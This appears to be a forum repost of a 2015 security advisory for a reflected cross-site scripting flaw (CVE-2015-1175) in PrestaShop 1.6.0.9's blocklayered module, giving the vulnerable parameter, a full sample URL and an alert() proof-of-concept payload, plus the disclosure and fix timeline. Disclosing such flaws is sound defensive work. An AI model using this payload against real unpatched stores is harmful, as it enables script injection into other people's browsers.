Jump to content
1488

Prestashop 1.6.0.9 Cross Site Scripting

Recommended Posts

CVE-2015-1175-xss-prestashop

Information
——————–
Advisory by Octogence.
Name: Reflected XSS Vulnerability in prestashop ecommerce software
Affected Software : Prestashop
Affected Versions: 1.6.0.9 and possibly below
Vendor Homepage : https://www.prestashop.com/


Vulnerability Type : Cross-site Scripting
Severity : High
CVE ID: CVE-2015-1175

Impact
——
An attacker can craft a URL with malicious JavaScript code which
executes in the browser.

Technical Details
—————–
Sample URL:

http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300

Parameter:
layered_price_slider

Sample Payload:
<img src=a onerror=alert(1)>

For more information on cross-site scripting vulnerabilities read the
following article:

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Advisory Timeline (mm/dd/yyyy)
——————–
01/07/2015 – Reported
01/12/2015 – Vulnerability Fixed
01/18/2015 – Advisory Released

http://octogence.com/advisories/cve-2015-1175-xss-prestashop/




Regards
Sudhanshu

Octogence Tech Solutions
Noida, India
Mobile | +91-9971658929
Website| www.octogence.com

Source : Prestashop 1.6.0.9 Cross Site Scripting ? Packet Storm

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...